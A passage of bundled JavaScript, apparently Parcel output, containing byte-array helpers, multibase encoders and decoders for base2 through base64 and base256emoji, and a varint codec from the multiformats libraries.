    if (globalThis.Buffer != null && globalThis.Buffer.alloc != null) return $784ac8dd0f23c14d$exports.asUint8Array(globalThis.Buffer.alloc(size));
    return new Uint8Array(size);
}
function $6082a548169c7b42$var$allocUnsafe(size = 0) {
    if (globalThis.Buffer != null && globalThis.Buffer.allocUnsafe != null) return $784ac8dd0f23c14d$exports.asUint8Array(globalThis.Buffer.allocUnsafe(size));
    return new Uint8Array(size);
}
$6082a548169c7b42$exports.alloc = $6082a548169c7b42$var$alloc;
$6082a548169c7b42$exports.allocUnsafe = $6082a548169c7b42$var$allocUnsafe;



function $475c4a512fd4a246$var$concat(arrays, length) {
    if (!length) length = arrays.reduce((acc, curr)=>acc + curr.length, 0);
    const output = $6082a548169c7b42$exports.allocUnsafe(length);
    let offset = 0;
    for (const arr of arrays){
        output.set(arr, offset);
        offset += arr.length;
    }
    return $784ac8dd0f23c14d$exports.asUint8Array(output);
}
$475c4a512fd4a246$exports.concat = $475c4a512fd4a246$var$concat;


var $41b0be3b2401ec7e$exports = {};
"use strict";
Object.defineProperty($41b0be3b2401ec7e$exports, "__esModule", {
    value: true
});
function $41b0be3b2401ec7e$var$equals(a, b) {
    if (a === b) return true;
    if (a.byteLength !== b.byteLength) return false;
    for(let i = 0; i < a.byteLength; i++){
        if (a[i] !== b[i]) return false;
    }
    return true;
}
$41b0be3b2401ec7e$exports.equals = $41b0be3b2401ec7e$var$equals;


var $a4ed053a1131469e$exports = {};
"use strict";
Object.defineProperty($a4ed053a1131469e$exports, "__esModule", {
    value: true
});
var $5884b53a084a924d$exports = {};
"use strict";
var $b633fa38a7f8a649$exports = {};
"use strict";
Object.defineProperty($b633fa38a7f8a649$exports, "__esModule", {
    value: true
});
var $fab4e33fc8c0336e$exports = {};
"use strict";
Object.defineProperty($fab4e33fc8c0336e$exports, "__esModule", {
    value: true
});
var $de6c852f920490b4$exports = {};
"use strict";
Object.defineProperty($de6c852f920490b4$exports, "__esModule", {
    value: true
});
var $0340df4a7a7e39d8$exports = {};
"use strict";
function $0340df4a7a7e39d8$var$base(ALPHABET, name) {
    if (ALPHABET.length >= 255) throw new TypeError("Alphabet too long");
    var BASE_MAP = new Uint8Array(256);
    for(var j = 0; j < BASE_MAP.length; j++)BASE_MAP[j] = 255;
    for(var i = 0; i < ALPHABET.length; i++){
        var x = ALPHABET.charAt(i);
        var xc = x.charCodeAt(0);
        if (BASE_MAP[xc] !== 255) throw new TypeError(x + " is ambiguous");
        BASE_MAP[xc] = i;
    }
    var BASE = ALPHABET.length;
    var LEADER = ALPHABET.charAt(0);
    var FACTOR = Math.log(BASE) / Math.log(256);
    var iFACTOR = Math.log(256) / Math.log(BASE);
    function encode(source) {
        if (source instanceof Uint8Array) ;
        else if (ArrayBuffer.isView(source)) source = new Uint8Array(source.buffer, source.byteOffset, source.byteLength);
        else if (Array.isArray(source)) source = Uint8Array.from(source);
        if (!(source instanceof Uint8Array)) throw new TypeError("Expected Uint8Array");
        if (source.length === 0) return "";
        var zeroes = 0;
        var length = 0;
        var pbegin = 0;
        var pend = source.length;
        while(pbegin !== pend && source[pbegin] === 0){
            pbegin++;
            zeroes++;
        }
        var size = (pend - pbegin) * iFACTOR + 1 >>> 0;
        var b58 = new Uint8Array(size);
        while(pbegin !== pend){
            var carry = source[pbegin];
            var i = 0;
            for(var it1 = size - 1; (carry !== 0 || i < length) && it1 !== -1; it1--, i++){
                carry += 256 * b58[it1] >>> 0;
                b58[it1] = carry % BASE >>> 0;
                carry = carry / BASE >>> 0;
            }
            if (carry !== 0) throw new Error("Non-zero carry");
            length = i;
            pbegin++;
        }
        var it2 = size - length;
        while(it2 !== size && b58[it2] === 0)it2++;
        var str = LEADER.repeat(zeroes);
        for(; it2 < size; ++it2)str += ALPHABET.charAt(b58[it2]);
        return str;
    }
    function decodeUnsafe(source) {
        if (typeof source !== "string") throw new TypeError("Expected String");
        if (source.length === 0) return new Uint8Array();
        var psz = 0;
        if (source[psz] === " ") return;
        var zeroes = 0;
        var length = 0;
        while(source[psz] === LEADER){
            zeroes++;
            psz++;
        }
        var size = (source.length - psz) * FACTOR + 1 >>> 0;
        var b256 = new Uint8Array(size);
        while(source[psz]){
            var carry = BASE_MAP[source.charCodeAt(psz)];
            if (carry === 255) return;
            var i = 0;
            for(var it3 = size - 1; (carry !== 0 || i < length) && it3 !== -1; it3--, i++){
                carry += BASE * b256[it3] >>> 0;
                b256[it3] = carry % 256 >>> 0;
                carry = carry / 256 >>> 0;
            }
            if (carry !== 0) throw new Error("Non-zero carry");
            length = i;
            psz++;
        }
        if (source[psz] === " ") return;
        var it4 = size - length;
        while(it4 !== size && b256[it4] === 0)it4++;
        var vch = new Uint8Array(zeroes + (size - it4));
        var j = zeroes;
        while(it4 !== size)vch[j++] = b256[it4++];
        return vch;
    }
    function decode(string) {
        var buffer = decodeUnsafe(string);
        if (buffer) return buffer;
        throw new Error(`Non-${name} character`);
    }
    return {
        encode: encode,
        decodeUnsafe: decodeUnsafe,
        decode: decode
    };
}
var $0340df4a7a7e39d8$var$src = $0340df4a7a7e39d8$var$base;
var $0340df4a7a7e39d8$var$_brrp__multiformats_scope_baseX = $0340df4a7a7e39d8$var$src;
$0340df4a7a7e39d8$exports = $0340df4a7a7e39d8$var$_brrp__multiformats_scope_baseX;


var $4d55dbc11a5f1aec$exports = {};
"use strict";
Object.defineProperty($4d55dbc11a5f1aec$exports, "__esModule", {
    value: true
});
const $4d55dbc11a5f1aec$var$empty = new Uint8Array(0);
const $4d55dbc11a5f1aec$var$toHex = (d)=>d.reduce((hex, byte)=>hex + byte.toString(16).padStart(2, "0"), "");
const $4d55dbc11a5f1aec$var$fromHex = (hex)=>{
    const hexes = hex.match(/../g);
    return hexes ? new Uint8Array(hexes.map((b)=>parseInt(b, 16))) : $4d55dbc11a5f1aec$var$empty;
};
const $4d55dbc11a5f1aec$var$equals = (aa, bb)=>{
    if (aa === bb) return true;
    if (aa.byteLength !== bb.byteLength) return false;
    for(let ii = 0; ii < aa.byteLength; ii++){
        if (aa[ii] !== bb[ii]) return false;
    }
    return true;
};
const $4d55dbc11a5f1aec$var$coerce = (o)=>{
    if (o instanceof Uint8Array && o.constructor.name === "Uint8Array") return o;
    if (o instanceof ArrayBuffer) return new Uint8Array(o);
    if (ArrayBuffer.isView(o)) return new Uint8Array(o.buffer, o.byteOffset, o.byteLength);
    throw new Error("Unknown type, must be binary type");
};
const $4d55dbc11a5f1aec$var$isBinary = (o)=>o instanceof ArrayBuffer || ArrayBuffer.isView(o);
const $4d55dbc11a5f1aec$var$fromString = (str)=>new TextEncoder().encode(str);
const $4d55dbc11a5f1aec$var$toString = (b)=>new TextDecoder().decode(b);
$4d55dbc11a5f1aec$exports.coerce = $4d55dbc11a5f1aec$var$coerce;
$4d55dbc11a5f1aec$exports.empty = $4d55dbc11a5f1aec$var$empty;
$4d55dbc11a5f1aec$exports.equals = $4d55dbc11a5f1aec$var$equals;
$4d55dbc11a5f1aec$exports.fromHex = $4d55dbc11a5f1aec$var$fromHex;
$4d55dbc11a5f1aec$exports.fromString = $4d55dbc11a5f1aec$var$fromString;
$4d55dbc11a5f1aec$exports.isBinary = $4d55dbc11a5f1aec$var$isBinary;
$4d55dbc11a5f1aec$exports.toHex = $4d55dbc11a5f1aec$var$toHex;
$4d55dbc11a5f1aec$exports.toString = $4d55dbc11a5f1aec$var$toString;


class $de6c852f920490b4$var$Encoder {
    constructor(name, prefix, baseEncode){
        this.name = name;
        this.prefix = prefix;
        this.baseEncode = baseEncode;
    }
    encode(bytes) {
        if (bytes instanceof Uint8Array) return `${this.prefix}${this.baseEncode(bytes)}`;
        else throw Error("Unknown type, must be binary type");
    }
}
class $de6c852f920490b4$var$Decoder {
    constructor(name, prefix, baseDecode){
        this.name = name;
        this.prefix = prefix;
        if (prefix.codePointAt(0) === undefined) throw new Error("Invalid prefix character");
        this.prefixCodePoint = prefix.codePointAt(0);
        this.baseDecode = baseDecode;
    }
    decode(text) {
        if (typeof text === "string") {
            if (text.codePointAt(0) !== this.prefixCodePoint) throw Error(`Unable to decode multibase string ${JSON.stringify(text)}, ${this.name} decoder only supports inputs prefixed with ${this.prefix}`);
            return this.baseDecode(text.slice(this.prefix.length));
        } else throw Error("Can only multibase decode strings");
    }
    or(decoder) {
        return $de6c852f920490b4$var$or(this, decoder);
    }
}
class $de6c852f920490b4$var$ComposedDecoder {
    constructor(decoders){
        this.decoders = decoders;
    }
    or(decoder) {
        return $de6c852f920490b4$var$or(this, decoder);
    }
    decode(input) {
        const prefix = input[0];
        const decoder = this.decoders[prefix];
        if (decoder) return decoder.decode(input);
        else throw RangeError(`Unable to decode multibase string ${JSON.stringify(input)}, only inputs prefixed with ${Object.keys(this.decoders)} are supported`);
    }
}
const $de6c852f920490b4$var$or = (left, right)=>new $de6c852f920490b4$var$ComposedDecoder({
        ...left.decoders || {
            [left.prefix]: left
        },
        ...right.decoders || {
            [right.prefix]: right
        }
    });
class $de6c852f920490b4$var$Codec {
    constructor(name, prefix, baseEncode, baseDecode){
        this.name = name;
        this.prefix = prefix;
        this.baseEncode = baseEncode;
        this.baseDecode = baseDecode;
        this.encoder = new $de6c852f920490b4$var$Encoder(name, prefix, baseEncode);
        this.decoder = new $de6c852f920490b4$var$Decoder(name, prefix, baseDecode);
    }
    encode(input) {
        return this.encoder.encode(input);
    }
    decode(input) {
        return this.decoder.decode(input);
    }
}
const $de6c852f920490b4$var$from = ({ name: name, prefix: prefix, encode: encode, decode: decode })=>new $de6c852f920490b4$var$Codec(name, prefix, encode, decode);
const $de6c852f920490b4$var$baseX = ({ prefix: prefix, name: name, alphabet: alphabet })=>{
    const { encode: encode, decode: decode } = $0340df4a7a7e39d8$exports(alphabet, name);
    return $de6c852f920490b4$var$from({
        prefix: prefix,
        name: name,
        encode: encode,
        decode: (text)=>$4d55dbc11a5f1aec$exports.coerce(decode(text))
    });
};
const $de6c852f920490b4$var$decode = (string, alphabet, bitsPerChar, name)=>{
    const codes = {};
    for(let i = 0; i < alphabet.length; ++i)codes[alphabet[i]] = i;
    let end = string.length;
    while(string[end - 1] === "=")--end;
    const out = new Uint8Array(end * bitsPerChar / 8 | 0);
    let bits = 0;
    let buffer = 0;
    let written = 0;
    for(let i = 0; i < end; ++i){
        const value = codes[string[i]];
        if (value === undefined) throw new SyntaxError(`Non-${name} character`);
        buffer = buffer << bitsPerChar | value;
        bits += bitsPerChar;
        if (bits >= 8) {
            bits -= 8;
            out[written++] = 255 & buffer >> bits;
        }
    }
    if (bits >= bitsPerChar || 255 & buffer << 8 - bits) throw new SyntaxError("Unexpected end of data");
    return out;
};
const $de6c852f920490b4$var$encode = (data, alphabet, bitsPerChar)=>{
    const pad = alphabet[alphabet.length - 1] === "=";
    const mask = (1 << bitsPerChar) - 1;
    let out = "";
    let bits = 0;
    let buffer = 0;
    for(let i = 0; i < data.length; ++i){
        buffer = buffer << 8 | data[i];
        bits += 8;
        while(bits > bitsPerChar){
            bits -= bitsPerChar;
            out += alphabet[mask & buffer >> bits];
        }
    }
    if (bits) out += alphabet[mask & buffer << bitsPerChar - bits];
    if (pad) while(out.length * bitsPerChar & 7)out += "=";
    return out;
};
const $de6c852f920490b4$var$rfc4648 = ({ name: name, prefix: prefix, bitsPerChar: bitsPerChar, alphabet: alphabet })=>{
    return $de6c852f920490b4$var$from({
        prefix: prefix,
        name: name,
        encode (input) {
            return $de6c852f920490b4$var$encode(input, alphabet, bitsPerChar);
        },
        decode (input) {
            return $de6c852f920490b4$var$decode(input, alphabet, bitsPerChar, name);
        }
    });
};
$de6c852f920490b4$exports.Codec = $de6c852f920490b4$var$Codec;
$de6c852f920490b4$exports.baseX = $de6c852f920490b4$var$baseX;
$de6c852f920490b4$exports.from = $de6c852f920490b4$var$from;
$de6c852f920490b4$exports.or = $de6c852f920490b4$var$or;
$de6c852f920490b4$exports.rfc4648 = $de6c852f920490b4$var$rfc4648;



const $fab4e33fc8c0336e$var$identity = $de6c852f920490b4$exports.from({
    prefix: "\x00",
    name: "identity",
    encode: (buf)=>$4d55dbc11a5f1aec$exports.toString(buf),
    decode: (str)=>$4d55dbc11a5f1aec$exports.fromString(str)
});
$fab4e33fc8c0336e$exports.identity = $fab4e33fc8c0336e$var$identity;


var $444f725972ab843c$exports = {};
"use strict";
Object.defineProperty($444f725972ab843c$exports, "__esModule", {
    value: true
});

const $444f725972ab843c$var$base2 = $de6c852f920490b4$exports.rfc4648({
    prefix: "0",
    name: "base2",
    alphabet: "01",
    bitsPerChar: 1
});
$444f725972ab843c$exports.base2 = $444f725972ab843c$var$base2;


var $7330be652d1faeae$exports = {};
"use strict";
Object.defineProperty($7330be652d1faeae$exports, "__esModule", {
    value: true
});

const $7330be652d1faeae$var$base8 = $de6c852f920490b4$exports.rfc4648({
    prefix: "7",
    name: "base8",
    alphabet: "01234567",
    bitsPerChar: 3
});
$7330be652d1faeae$exports.base8 = $7330be652d1faeae$var$base8;


var $7c7f7dd3c1547a66$exports = {};
"use strict";
Object.defineProperty($7c7f7dd3c1547a66$exports, "__esModule", {
    value: true
});

const $7c7f7dd3c1547a66$var$base10 = $de6c852f920490b4$exports.baseX({
    prefix: "9",
    name: "base10",
    alphabet: "0123456789"
});
$7c7f7dd3c1547a66$exports.base10 = $7c7f7dd3c1547a66$var$base10;


var $4e3d0e6f3707af45$exports = {};
"use strict";
Object.defineProperty($4e3d0e6f3707af45$exports, "__esModule", {
    value: true
});

const $4e3d0e6f3707af45$var$base16 = $de6c852f920490b4$exports.rfc4648({
    prefix: "f",
    name: "base16",
    alphabet: "0123456789abcdef",
    bitsPerChar: 4
});
const $4e3d0e6f3707af45$var$base16upper = $de6c852f920490b4$exports.rfc4648({
    prefix: "F",
    name: "base16upper",
    alphabet: "0123456789ABCDEF",
    bitsPerChar: 4
});
$4e3d0e6f3707af45$exports.base16 = $4e3d0e6f3707af45$var$base16;
$4e3d0e6f3707af45$exports.base16upper = $4e3d0e6f3707af45$var$base16upper;


var $6d183b7418ac11d8$exports = {};
"use strict";
Object.defineProperty($6d183b7418ac11d8$exports, "__esModule", {
    value: true
});

const $6d183b7418ac11d8$var$base32 = $de6c852f920490b4$exports.rfc4648({
    prefix: "b",
    name: "base32",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32upper = $de6c852f920490b4$exports.rfc4648({
    prefix: "B",
    name: "base32upper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32pad = $de6c852f920490b4$exports.rfc4648({
    prefix: "c",
    name: "base32pad",
    alphabet: "abcdefghijklmnopqrstuvwxyz234567=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32padupper = $de6c852f920490b4$exports.rfc4648({
    prefix: "C",
    name: "base32padupper",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZ234567=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hex = $de6c852f920490b4$exports.rfc4648({
    prefix: "v",
    name: "base32hex",
    alphabet: "0123456789abcdefghijklmnopqrstuv",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hexupper = $de6c852f920490b4$exports.rfc4648({
    prefix: "V",
    name: "base32hexupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hexpad = $de6c852f920490b4$exports.rfc4648({
    prefix: "t",
    name: "base32hexpad",
    alphabet: "0123456789abcdefghijklmnopqrstuv=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32hexpadupper = $de6c852f920490b4$exports.rfc4648({
    prefix: "T",
    name: "base32hexpadupper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUV=",
    bitsPerChar: 5
});
const $6d183b7418ac11d8$var$base32z = $de6c852f920490b4$exports.rfc4648({
    prefix: "h",
    name: "base32z",
    alphabet: "ybndrfg8ejkmcpqxot1uwisza345h769",
    bitsPerChar: 5
});
$6d183b7418ac11d8$exports.base32 = $6d183b7418ac11d8$var$base32;
$6d183b7418ac11d8$exports.base32hex = $6d183b7418ac11d8$var$base32hex;
$6d183b7418ac11d8$exports.base32hexpad = $6d183b7418ac11d8$var$base32hexpad;
$6d183b7418ac11d8$exports.base32hexpadupper = $6d183b7418ac11d8$var$base32hexpadupper;
$6d183b7418ac11d8$exports.base32hexupper = $6d183b7418ac11d8$var$base32hexupper;
$6d183b7418ac11d8$exports.base32pad = $6d183b7418ac11d8$var$base32pad;
$6d183b7418ac11d8$exports.base32padupper = $6d183b7418ac11d8$var$base32padupper;
$6d183b7418ac11d8$exports.base32upper = $6d183b7418ac11d8$var$base32upper;
$6d183b7418ac11d8$exports.base32z = $6d183b7418ac11d8$var$base32z;


var $2478ed668ff199ad$exports = {};
"use strict";
Object.defineProperty($2478ed668ff199ad$exports, "__esModule", {
    value: true
});

const $2478ed668ff199ad$var$base36 = $de6c852f920490b4$exports.baseX({
    prefix: "k",
    name: "base36",
    alphabet: "0123456789abcdefghijklmnopqrstuvwxyz"
});
const $2478ed668ff199ad$var$base36upper = $de6c852f920490b4$exports.baseX({
    prefix: "K",
    name: "base36upper",
    alphabet: "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ"
});
$2478ed668ff199ad$exports.base36 = $2478ed668ff199ad$var$base36;
$2478ed668ff199ad$exports.base36upper = $2478ed668ff199ad$var$base36upper;


var $bb23e06a31e86f7c$exports = {};
"use strict";
Object.defineProperty($bb23e06a31e86f7c$exports, "__esModule", {
    value: true
});

const $bb23e06a31e86f7c$var$base58btc = $de6c852f920490b4$exports.baseX({
    name: "base58btc",
    prefix: "z",
    alphabet: "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
});
const $bb23e06a31e86f7c$var$base58flickr = $de6c852f920490b4$exports.baseX({
    name: "base58flickr",
    prefix: "Z",
    alphabet: "123456789abcdefghijkmnopqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ"
});
$bb23e06a31e86f7c$exports.base58btc = $bb23e06a31e86f7c$var$base58btc;
$bb23e06a31e86f7c$exports.base58flickr = $bb23e06a31e86f7c$var$base58flickr;


var $de0d70bb34ca5e4e$exports = {};
"use strict";
Object.defineProperty($de0d70bb34ca5e4e$exports, "__esModule", {
    value: true
});

const $de0d70bb34ca5e4e$var$base64 = $de6c852f920490b4$exports.rfc4648({
    prefix: "m",
    name: "base64",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/",
    bitsPerChar: 6
});
const $de0d70bb34ca5e4e$var$base64pad = $de6c852f920490b4$exports.rfc4648({
    prefix: "M",
    name: "base64pad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
    bitsPerChar: 6
});
const $de0d70bb34ca5e4e$var$base64url = $de6c852f920490b4$exports.rfc4648({
    prefix: "u",
    name: "base64url",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_",
    bitsPerChar: 6
});
const $de0d70bb34ca5e4e$var$base64urlpad = $de6c852f920490b4$exports.rfc4648({
    prefix: "U",
    name: "base64urlpad",
    alphabet: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=",
    bitsPerChar: 6
});
$de0d70bb34ca5e4e$exports.base64 = $de0d70bb34ca5e4e$var$base64;
$de0d70bb34ca5e4e$exports.base64pad = $de0d70bb34ca5e4e$var$base64pad;
$de0d70bb34ca5e4e$exports.base64url = $de0d70bb34ca5e4e$var$base64url;
$de0d70bb34ca5e4e$exports.base64urlpad = $de0d70bb34ca5e4e$var$base64urlpad;


var $c9e395f0a3e1277d$exports = {};
"use strict";
Object.defineProperty($c9e395f0a3e1277d$exports, "__esModule", {
    value: true
});

const $c9e395f0a3e1277d$var$alphabet = Array.from("\uD83D\uDE80\uD83E\uDE90☄\uD83D\uDEF0\uD83C\uDF0C\uD83C\uDF11\uD83C\uDF12\uD83C\uDF13\uD83C\uDF14\uD83C\uDF15\uD83C\uDF16\uD83C\uDF17\uD83C\uDF18\uD83C\uDF0D\uD83C\uDF0F\uD83C\uDF0E\uD83D\uDC09☀\uD83D\uDCBB\uD83D\uDDA5\uD83D\uDCBE\uD83D\uDCBF\uD83D\uDE02❤\uD83D\uDE0D\uD83E\uDD23\uD83D\uDE0A\uD83D\uDE4F\uD83D\uDC95\uD83D\uDE2D\uD83D\uDE18\uD83D\uDC4D\uD83D\uDE05\uD83D\uDC4F\uD83D\uDE01\uD83D\uDD25\uD83E\uDD70\uD83D\uDC94\uD83D\uDC96\uD83D\uDC99\uD83D\uDE22\uD83E\uDD14\uD83D\uDE06\uD83D\uDE44\uD83D\uDCAA\uD83D\uDE09☺\uD83D\uDC4C\uD83E\uDD17\uD83D\uDC9C\uD83D\uDE14\uD83D\uDE0E\uD83D\uDE07\uD83C\uDF39\uD83E\uDD26\uD83C\uDF89\uD83D\uDC9E✌✨\uD83E\uDD37\uD83D\uDE31\uD83D\uDE0C\uD83C\uDF38\uD83D\uDE4C\uD83D\uDE0B\uD83D\uDC97\uD83D\uDC9A\uD83D\uDE0F\uD83D\uDC9B\uD83D\uDE42\uD83D\uDC93\uD83E\uDD29\uD83D\uDE04\uD83D\uDE00\uD83D\uDDA4\uD83D\uDE03\uD83D\uDCAF\uD83D\uDE48\uD83D\uDC47\uD83C\uDFB6\uD83D\uDE12\uD83E\uDD2D❣\uD83D\uDE1C\uD83D\uDC8B\uD83D\uDC40\uD83D\uDE2A\uD83D\uDE11\uD83D\uDCA5\uD83D\uDE4B\uD83D\uDE1E\uD83D\uDE29\uD83D\uDE21\uD83E\uDD2A\uD83D\uDC4A\uD83E\uDD73\uD83D\uDE25\uD83E\uDD24\uD83D\uDC49\uD83D\uDC83\uD83D\uDE33✋\uD83D\uDE1A\uD83D\uDE1D\uD83D\uDE34\uD83C\uDF1F\uD83D\uDE2C\uD83D\uDE43\uD83C\uDF40\uD83C\uDF37\uD83D\uDE3B\uD83D\uDE13⭐✅\uD83E\uDD7A\uD83C\uDF08\uD83D\uDE08\uD83E\uDD18\uD83D\uDCA6✔\uD83D\uDE23\uD83C\uDFC3\uD83D\uDC90☹\uD83C\uDF8A\uD83D\uDC98\uD83D\uDE20☝\uD83D\uDE15\uD83C\uDF3A\uD83C\uDF82\uD83C\uDF3B\uD83D\uDE10\uD83D\uDD95\uD83D\uDC9D\uD83D\uDE4A\uD83D\uDE39\uD83D\uDDE3\uD83D\uDCAB\uD83D\uDC80\uD83D\uDC51\uD83C\uDFB5\uD83E\uDD1E\uD83D\uDE1B\uD83D\uDD34\uD83D\uDE24\uD83C\uDF3C\uD83D\uDE2B⚽\uD83E\uDD19☕\uD83C\uDFC6\uD83E\uDD2B\uD83D\uDC48\uD83D\uDE2E\uD83D\uDE46\uD83C\uDF7B\uD83C\uDF43\uD83D\uDC36\uD83D\uDC81\uD83D\uDE32\uD83C\uDF3F\uD83E\uDDE1\uD83C\uDF81⚡\uD83C\uDF1E\uD83C\uDF88❌✊\uD83D\uDC4B\uD83D\uDE30\uD83E\uDD28\uD83D\uDE36\uD83E\uDD1D\uD83D\uDEB6\uD83D\uDCB0\uD83C\uDF53\uD83D\uDCA2\uD83E\uDD1F\uD83D\uDE41\uD83D\uDEA8\uD83D\uDCA8\uD83E\uDD2C✈\uD83C\uDF80\uD83C\uDF7A\uD83E\uDD13\uD83D\uDE19\uD83D\uDC9F\uD83C\uDF31\uD83D\uDE16\uD83D\uDC76\uD83E\uDD74▶➡❓\uD83D\uDC8E\uD83D\uDCB8⬇\uD83D\uDE28\uD83C\uDF1A\uD83E\uDD8B\uD83D\uDE37\uD83D\uDD7A⚠\uD83D\uDE45\uD83D\uDE1F\uD83D\uDE35\uD83D\uDC4E\uD83E\uDD32\uD83E\uDD20\uD83E\uDD27\uD83D\uDCCC\uD83D\uDD35\uD83D\uDC85\uD83E\uDDD0\uD83D\uDC3E\uD83C\uDF52\uD83D\uDE17\uD83E\uDD11\uD83C\uDF0A\uD83E\uDD2F\uD83D\uDC37☎\uD83D\uDCA7\uD83D\uDE2F\uD83D\uDC86\uD83D\uDC46\uD83C\uDFA4\uD83D\uDE47\uD83C\uDF51❄\uD83C\uDF34\uD83D\uDCA3\uD83D\uDC38\uD83D\uDC8C\uD83D\uDCCD\uD83E\uDD40\uD83E\uDD22\uD83D\uDC45\uD83D\uDCA1\uD83D\uDCA9\uD83D\uDC50\uD83D\uDCF8\uD83D\uDC7B\uD83E\uDD10\uD83E\uDD2E\uD83C\uDFBC\uD83E\uDD75\uD83D\uDEA9\uD83C\uDF4E\uD83C\uDF4A\uD83D\uDC7C\uD83D\uDC8D\uD83D\uDCE3\uD83E\uDD42");
const $c9e395f0a3e1277d$var$alphabetBytesToChars = $c9e395f0a3e1277d$var$alphabet.reduce((p, c, i)=>{
    p[i] = c;
    return p;
}, []);
const $c9e395f0a3e1277d$var$alphabetCharsToBytes = $c9e395f0a3e1277d$var$alphabet.reduce((p, c, i)=>{
    p[c.codePointAt(0)] = i;
    return p;
}, []);
function $c9e395f0a3e1277d$var$encode(data) {
    return data.reduce((p, c)=>{
        p += $c9e395f0a3e1277d$var$alphabetBytesToChars[c];
        return p;
    }, "");
}
function $c9e395f0a3e1277d$var$decode(str) {
    const byts = [];
    for (const char of str){
        const byt = $c9e395f0a3e1277d$var$alphabetCharsToBytes[char.codePointAt(0)];
        if (byt === undefined) throw new Error(`Non-base256emoji character: ${char}`);
        byts.push(byt);
    }
    return new Uint8Array(byts);
}
const $c9e395f0a3e1277d$var$base256emoji = $de6c852f920490b4$exports.from({
    prefix: "\uD83D\uDE80",
    name: "base256emoji",
    encode: $c9e395f0a3e1277d$var$encode,
    decode: $c9e395f0a3e1277d$var$decode
});
$c9e395f0a3e1277d$exports.base256emoji = $c9e395f0a3e1277d$var$base256emoji;


var $fc5536b924e664f3$exports = {};
"use strict";
Object.defineProperty($fc5536b924e664f3$exports, "__esModule", {
    value: true
});
var $baed353b52eedd46$exports = {};
"use strict";
Object.defineProperty($baed353b52eedd46$exports, "__esModule", {
    value: true
});
var $f302a42295b946b3$exports = {};
"use strict";
Object.defineProperty($f302a42295b946b3$exports, "__esModule", {
    value: true
});

var $32dd57f0aae68c66$exports = {};
"use strict";
Object.defineProperty($32dd57f0aae68c66$exports, "__esModule", {
    value: true
});
var $fa05a038af787ba8$exports = {};
"use strict";
var $fa05a038af787ba8$var$encode_1 = $fa05a038af787ba8$var$encode;
var $fa05a038af787ba8$var$MSB = 128, $fa05a038af787ba8$var$REST = 127, $fa05a038af787ba8$var$MSBALL = ~$fa05a038af787ba8$var$REST, $fa05a038af787ba8$var$INT = Math.pow(2, 31);
function $fa05a038af787ba8$var$encode(num, out, offset) {
    out = out || [];
    offset = offset || 0;
    var oldOffset = offset;
    while(num >= $fa05a038af787ba8$var$INT){
        out[offset++] = num & 255 | $fa05a038af787ba8$var$MSB;
        num /= 128;
    }
    while(num & $fa05a038af787ba8$var$MSBALL){
        out[offset++] = num & 255 | $fa05a038af787ba8$var$MSB;
        num >>>= 7;
    }
    out[offset] = num | 0;
    $fa05a038af787ba8$var$encode.bytes = offset - oldOffset + 1;
    return out;
}
var $fa05a038af787ba8$var$decode = $fa05a038af787ba8$var$read;
var $fa05a038af787ba8$var$MSB$1 = 128, $fa05a038af787ba8$var$REST$1 = 127;
function $fa05a038af787ba8$var$read(buf, offset) {
    var res = 0, offset = offset || 0, shift = 0, counter = offset, b, l = buf.length;
    do {
        if (counter >= l) {
            $fa05a038af787ba8$var$read.bytes = 0;
            throw new RangeError("Could not decode varint");
        }
        b = buf[counter++];
        res += shift < 28 ? (b & $fa05a038af787ba8$var$REST$1) << shift : (b & $fa05a038af787ba8$var$REST$1) * Math.pow(2, shift);
        shift += 7;
    }while (b >= $fa05a038af787ba8$var$MSB$1);
    $fa05a038af787ba8$var$read.bytes = counter - offset;
    return res;
}
var $fa05a038af787ba8$var$N1 = Math.pow(2, 7);
var $fa05a038af787ba8$var$N2 = Math.pow(2, 14);
var $fa05a038af787ba8$var$N3 = Math.pow(2, 21);
var $fa05a038af787ba8$var$N4 = Math.pow(2, 28);
var $fa05a038af787ba8$var$N5 = Math.pow(2, 35);
var $fa05a038af787ba8$var$N6 = Math.pow(2, 42);
var $fa05a038af787ba8$var$N7 = Math.pow(2, 49);
var $fa05a038af787ba8$var$N8 = Math.pow(2, 56);
var $fa05a038af787ba8$var$N9 = Math.pow(2, 63);
var $fa05a038af787ba8$var$length = function(value) {
    return value < $fa05a038af787ba8$var$N1 ? 1 : value < $fa05a038af787ba8$var$N2 ? 2 : value < $fa05a038af787ba8$var$N3 ? 3 : value < $fa05a038af787ba8$var$N4 ? 4 : value < $fa05a038af787ba8$var$N5 ? 5 : value < $fa05a038af787ba8$var$N6 ? 6 : value < $fa05a038af787ba8$var$N7 ? 7 : value < $fa05a038af787ba8$var$N8 ? 8 : value < $fa05a038af787ba8$var$N9 ? 9 : 10;
};
var $fa05a038af787ba8$var$varint = {
    encode: $fa05a038af787ba8$var$encode_1,
    decode: $fa05a038af787ba8$var$decode,
    encodingLength: $fa05a038af787ba8$var$length
};
var $fa05a038af787ba8$var$_brrp_varint = $fa05a038af787ba8$var$varint;
var $fa05a038af787ba8$var$varint$1 = $fa05a038af787ba8$var$_brrp_varint;
$fa05a038af787ba8$exports = $fa05a038af787ba8$var$varint$1;


const $32dd57f0aae68c66$var$decode = (data, offset = 0)=>{
    const code = $fa05a038af787ba8$exports.decode(data, offset);
    return [
        code,
